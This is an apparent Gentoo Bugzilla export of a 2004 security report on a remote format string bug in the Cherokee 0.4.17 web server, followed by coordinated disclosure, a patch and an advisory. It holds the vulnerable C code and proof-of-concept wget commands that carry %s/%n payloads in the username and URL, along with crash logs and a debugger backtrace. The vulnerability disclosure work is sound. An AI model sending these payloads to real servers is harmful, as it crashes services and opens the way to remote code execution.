<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE bugzilla SYSTEM "http://bugs.gentoo.org/bugzilla.dtd">

<bugzilla version="2.22.7"
          urlbase="http://bugs.gentoo.org/"
          maintainer="bugzilla@gentoo.org"
>

    <bug>
          <bug_id>67667</bug_id>
          
          <creation_ts>2004-10-15 08:02 0000</creation_ts>
          <short_desc>www-servers/cherokee: remote Format String Vulnerability</short_desc>
          <delta_ts>2004-11-04 14:26:28 0000</delta_ts>
          
          
          <classification_id>1</classification_id>
          <classification>Unclassified</classification>
          <product>Gentoo Security</product>
          <component>Vulnerabilities</component>
          <version>unspecified</version>
          <rep_platform>All</rep_platform>
          <op_sys>All</op_sys>
          <bug_status>RESOLVED</bug_status>
          <resolution>FIXED</resolution>
          <bug_file_loc>http://www.alobbs.com/cherokee</bug_file_loc>
          <status_whiteboard>B1 [glsa] jaervosz</status_whiteboard>
          
          <priority>P2</priority>
          <bug_severity>major</bug_severity>
          <target_milestone>---</target_milestone>
          
          
          
          <everconfirmed>1</everconfirmed>
          <reporter>ruth@gentoo.org</reporter>
          <assigned_to>security@gentoo.org</assigned_to>
          <cc>stuart@gentoo.org</cc>

      

      
          <long_desc isprivate="0">
            <who>ruth@gentoo.org</who>
            <bug_when>2004-10-15 08:02:05 0000</bug_when>
<thetext>hi,
i have found a remotely exploitable format string bug in the web server cherokee-0.4.17.

the affected function is located in logger_ncsa.c:

cherokee_logger_ncsa_write_string():

ret_t 
cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string)
{
	if (logger-&gt;accesslog_fd != NULL) {
		int ret;
		ret = fprintf (logger-&gt;accesslog_fd, string);

		return (ret &gt; 0) ? ret_ok : ret_error;
	} 

	syslog (LOG_INFO, &quot;%s&quot;, string);
	return ret_ok;
}

this function is called if a user authenticates to the server with username plus password (via auth_pam)
in validator_pass.c:

--- snip ---
ret_t 
cherokee_validator_pam_check (cherokee_validator_pam_t  *pam, cherokee_connection_t *conn)
{
...
	/* Try to authenticate user:
	 */
	ret = _pam_dispatch (pamhandle, 0, 1);
	if (ret != PAM_SUCCESS) {
		cherokee_logger_write_string (
			CONN_VSRV(conn)-&gt;logger,
			&quot;PAM: user &apos;%s&apos; - not authenticated: %s&quot;, 
			conn-&gt;user-&gt;buf, pam_strerror(pamhandle, ret));

		goto unauthorized;
	}
...
--- snip ---

demonstration:

client:
bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html
--01:12:39--  http://127.0.0.1/private/index.html
           =&gt; `index.html&apos;
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response...
End of file while parsing headers.
Retrying.

--01:12:41--  http://127.0.0.1/private/index.html
  (try: 2) =&gt; `index.html&apos;
Connecting to 127.0.0.1:80... failed: Connection refused.
bash-2.05b$

server:

bender root # cherokee -C /etc/cherokee/cherokee.conf
PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it.
Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit
5 threads, 204 fds in each, standard scheduling policy, TLS disabled
Cherokee feels panic!
Killed
bender root #


server log:
you can find very interesting data in /var/log/cherokee.access:

PAM: user &apos;(null)0Ã¶0Ã¶PAM: user &apos;%s%s%s%s%s%s%s%s%s%s%s&apos; - not authenticated: User not known to the underlying authentication module0Ã¶$Ã¬PAM: user &apos;%s%s%s%s%s%s%s%s%s%s%s&apos; - not authenticated: User not known to the underlying authentication modulePAM: user &apos;%s&apos; - not authenticated: %sÂ  1@Ã¬d@$G@Ã&amp;#155;/@$G@Â°.@Â°XPAM: user &apos;(null)0Ã¶0Ã¶PAM: user &apos;%s%s%s%s%s%s%s%s%s%s%s&apos; - not authenticated: User not known to the underlying authentication module0Ã¶$Ã¬PAM: user &apos;%s%s%s%s%s%s%s%s%s%s%s&apos; - not authenticated: User not known to the underlying authentication modulePAM: user &apos;%s&apos; - not authenticated: %sÂ  1@Ã¬d@$G@Ã&amp;#155;/@$G@Â Â°.@Â¨X

to be clear: the syslog() function is properly protected - it happens one before...

debugger attached to server:

Attaching to program: /usr/sbin/cherokee, process 23158
Reading symbols from /usr/lib/libcherokee.so.0...done.
Loaded symbols for /usr/lib/libcherokee.so.0
Reading symbols from /lib/libpthread.so.0...done.
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 23158)]
[New Thread 32769 (LWP 23159)]
[New Thread 16386 (LWP 23160)]
[New Thread 32771 (LWP 23161)]
[New Thread 49156 (LWP 23162)]
[New Thread 65541 (LWP 23163)]
Loaded symbols for /lib/libpthread.so.0
Reading symbols from /lib/libdl.so.2...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...done.

[more symbols]

Reading symbols from /usr/lib/cherokee/libcherokee_plain.so...done.
Loaded symbols for /usr/lib/cherokee/libcherokee_plain.so
0x40165a11 in loser_poll () from /lib/libc.so.6
(gdb) step
Single stepping until exit from function loser_poll,
which has no line number information.
[Switching to Thread 16384 (LWP 23158)]
0x40165aca in poll () from /lib/libc.so.6
(gdb) step
Single stepping until exit from function poll,
which has no line number information.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 65541 (LWP 23163)]
0x4011f753 in strlen () from /lib/libc.so.6
(gdb) backtrace
#0  0x4011f753 in strlen () from /lib/libc.so.6
#1  0x400f6d29 in vfprintf () from /lib/libc.so.6
#2  0x400fcfef in fprintf () from /lib/libc.so.6
#3  0x4030292d in cherokee_logger_ncsa_write_string (logger=0x3a4d4150,
    string=0x267a &lt;Address 0x267a out of bounds&gt;) at logger_ncsa.c:295
#4  0x4003e7c8 in cherokee_logger_write_string (logger=0x806e150,
    format=0x3a4d4150 &lt;Address 0x3a4d4150 out of bounds&gt;) at logger.c:156
#5  0x402fdd55 in cherokee_validator_pam_check (pam=0x807ef10, conn=0x807e780) at validator_pam.c:180
#6  0x40042eb0 in cherokee_validator_check (validator=0x0, conn=0x3a4d4150) at validator.c:63
#7  0x40039d44 in cherokee_connection_check_authentication (cnt=0x807e780, plugin_entry=0x806ef18)
    at connection.c:1296
#8  0x4003f171 in process_active_connections (thd=0x807d090) at thread.c:460
#9  0x4003fce8 in cherokee_thread_step_MULTI_THREAD (thd=0x807d090, dont_block=false) at thread.c:1096
#10 0x4003eb84 in thread_routine (data=0x807d090) at thread.c:73
#11 0x4006b01f in pthread_start_thread () from /lib/libpthread.so.0
#12 0x4016ee6a in clone () from /lib/libc.so.6
(gdb)

another impact:

client:
wget http://127.0.0.1/%s%s%s%s%s%s%s%s%s%s%s%s%s% [+x] %s

serverlog:
127.0.0.1 - - [15/Oct/2004:01:30:58 +0100] &quot;GET /%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$G@pP]Ã¨@P`,ÃºÂ¿$G@`PXÂ¤@P`$G@Ã&amp;#138;Ã­@``DÃºÂ¿$G@$G@`Ã¯@`xÃºÂ¿ Â«@Ã§Â´Â´â&amp;#150;&amp;#146;Â©$G@PÃ§Ã¨Ã¼Â°Ã§$G@Ã&amp;#140;Ã»Â¿Ã«@u@;@Ã Ã»Â¿;@Ã Ã»Â¿Â°@Ã¸Ã¼Â¿Â¯@jÃ®@Ã Ã»Â¿ Â¤@(@(@ Â¤Ã¸Ã¿Â¿@Âµ@ Â¤@â&amp;#150;&amp;#146;Ã¸Ã¿Â¿$G@Ã&amp;#152;Ã&amp;#140;P(Â¨@Ã¬ Â¤@u@Ã&amp;#128;Ã&amp;#128;&apos;Ã&amp;#128;!Ã½Â¿aÂ¤Ã½Â¿Â¬Ã½Â¿Ã¿Â¿ÂªÃ&amp;#128;@0Â¤@

we&apos;re basically hitting the stack here... we can do everything, send shellcode, write .dtors, etc...

Impact:

-&gt; a successful exploitation of this bug leads to execution of arbitrary code (with server rights, of course)
-&gt; in case of unsuccessful exploitation, this leads to a denial of service.

i think this bug should be fixed upstream; therefore i have not attached a patch for this issue.
the author has _not_ yet been informed about this bug.

best regards

florian [rootshell]</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>koon@gentoo.org</who>
            <bug_when>2004-10-20 01:10:42 0000</bug_when>
            <thetext>Audit team, please peer-review this one before we take it to upstream and/or vendor-sec.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>krispykringle@gentoo.org</who>
            <bug_when>2004-10-26 14:47:26 0000</bug_when>
            <thetext>This is confirmed. Easy DoS, potential code execution (I&apos;ll have to spend more time on that part; I haven&apos;t managed RCE yet). 

Time to contact the Cherokee dev team and possibly forward to vendor-sec. I&apos;m writing to them now. 

Thanks, rootshell.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>koon@gentoo.org</who>
            <bug_when>2004-10-27 01:14:50 0000</bug_when>
            <thetext>Krispy: don&apos;t forget to credit Florian if you write directly upstream. Maybe it&apos;s best if he writes to them himself.

klieber/solar: do you think this one needs to be coordinated with vendor-sec ? Who ships cherokee ?</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>ruth@gentoo.org</who>
            <bug_when>2004-10-30 07:43:34 0000</bug_when>
            <thetext>hi,
i just got this email (as CC) from the cherokee maintainer:

-- mail --

Hi Dan,

  First of all, thank you very much for the report :-)


  There are two patched versions that correct this bug:

  - The 0.4.17.1: It is the fixed 0.4.17:

    ftp://alobbs.com/cherokee/0.4/0.4.17/cherokee-0.4.17.1.tar.gz

  - The 0.4.18b25: It is a beta of the incoming release of
    Cherokee. It contains new features, but of are unfinished yet:

    http://alobbs.com/tmp/cherokee-0.4.18b25.tar.gz

-- eof --

so please bump up to version 0.4.17.1
safe to go public now...

best regards

florian [rootshell]
</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>ruth@gentoo.org</who>
            <bug_when>2004-10-30 07:48:15 0000</bug_when>
            <thetext>this is the debian maintainer, btw:

http://people.debian.org/~rcardenes/#cherokee

seems that other distributions do _not_ ship cherokee by default...
(at least i can&apos;t find &apos;official&apos; rpms)

best regards

florian [rootshell]
</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>jaervosz@gentoo.org</who>
            <bug_when>2004-10-30 08:35:18 0000</bug_when>
            <thetext>Stuart please provide an updated ebuild or CC the right dev as this is not a public bug.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>stuart@gentoo.org</who>
            <bug_when>2004-10-30 10:12:36 0000</bug_when>
            <thetext>Updated ebuild committed, and marked stable on x86.  Just needs marking stable on ppc now.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>jaervosz@gentoo.org</who>
            <bug_when>2004-10-30 13:49:44 0000</bug_when>
            <thetext>CC&apos;ing pvdabeel instead of ppc as this bug is not public.

Pieter please test and mark 0.4.17.1 stable.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>koon@gentoo.org</who>
            <bug_when>2004-11-01 02:16:18 0000</bug_when>
            <thetext>This is public now (see http://alobbs.com/)
ppc: please mark stable.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>hansmi@gentoo.org</who>
            <bug_when>2004-11-01 02:34:22 0000</bug_when>
            <thetext>Stable on ppc.</thetext>
          </long_desc>
          <long_desc isprivate="0">
            <who>jaervosz@gentoo.org</who>
            <bug_when>2004-11-01 10:16:43 0000</bug_when>
            <thetext>GLSA 200411-02</thetext>
          </long_desc>
      
    </bug>

</bugzilla>